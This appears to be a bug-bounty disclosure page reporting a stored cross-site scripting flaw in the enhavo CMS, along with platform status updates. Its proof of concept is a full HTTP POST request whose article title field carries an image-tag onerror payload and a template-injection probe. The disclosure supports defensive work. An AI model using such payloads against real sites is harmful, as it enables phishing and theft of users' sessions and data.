Store XSS in enhavo/enhavo
Valid
Reported on
May 1st 2022
Description
Phishing and stealing users through vulnerabilities and accessing users' personal information
Proof of Concept
POST /admin/enhavo/article/article/update/5?view_id=6 HTTP/1.1
Host: demo.enhavo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://demo.enhavo.com/admin/enhavo/article/article/update/5?view_id=6
Content-Type: application/x-www-form-urlencoded
Content-Length: 2555
Cookie: PHPSESSID=etbamrm56rjoju30nfffvjr3h6
Connection: close
Upgrade-Insecure-Requests: 1
article%5Btitle%5D=Cats&article%5Bteaser%5D=%3Cp%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%E3%80%821111%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fp%3E&article%5Bpicture%5D%5B0%5D%5Bfilename%5D=article-img-05.png&article%5Bpicture%5D%5B0%5D%5Border%5D=0&article%5Bpicture%5D%5B0%5D%5Bparameters%5D%5Balt%5D=&article%5Bpicture%5D%5B0%5D%5Bparameters%5D%5Btitle%5D=&article%5Bpicture%5D%5B0%5D%5Bid%5D=5&files=&article%5Bcategories%5D%5B%5D=1&article%5Btags%5D=&article%5Bpublication_date%5D=30.04.2022+22%3A01&article%5Bpublished_until%5D=&article%5Bpublic%5D=true&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bposition%5D=1&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bname%5D=text&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btitle%5D%5Btext%5D=%27%22%3E%3CiMg+SrC%3Dx+OnErRoR%3Dalert%289999%29%3E%7B%7B7*7%7D%7D&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btitle%5D%5Btag%5D=&article%5Bcontent%5D%5Bchildren%5D%5B0%5D%5Bblock%5D%5Btext%5D=%3Cp%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%2C+sed+diam+voluptua%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%E5%9C%A8+vero+eos+et+accusam+et+justo+duo+dolores+et+ea+rebum%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3EStet+clita+kasd+gubergren%2C+no+sea+takimata+sanctus+est+Lorem+ipsum+dolor+sit+amet%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3ELorem+ipsum+dolor+sit+amet%2C+consetetur+sadipscing+elitr%2C+sed+diam+nonumy+eirmod+tempor+invidunt+ut+labore+et+dolore+magna+aliquyam+erat%2C+sed+diam+voluptua%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3E%E5%9C%A8+vero+eos+et+accusam+et+justo+duo+dolores+et+ea+rebum%E3%80%82%3C%2Fspan%3E%3Cspan+style%3D%22vertical-align%3A+inherit%3B%22%3EStet+clita+kasd+gubergren%2C+no+sea+takimata+sanctus+est+Lorem+ipsum+dolor+sit+amet%E3%80%82%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fp%3E&article%5Bpage_title%5D=&article%5Bslug%5D=cats&article%5Bmeta_description%5D=&article%5Bpriority%5D=0.5&article%5Bchange_frequency%5D=never&article%5BnoIndex%5D=false&article%5BnoFollow%5D=false&article%5B_token%5D=msmuiOw45V3PERHhmxPXHuqkVoOcKVLypgkuOO5KPzY
Impact
Through this vulnerability, the user is phished and the user's personal privacy information is stolen
References
We are processing your report and will contact the
enhavo
team within 24 hours.
a year ago
wind226 modified the report
a year ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
a year ago
We have contacted a member of the
enhavo
team and are waiting to hear back
a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation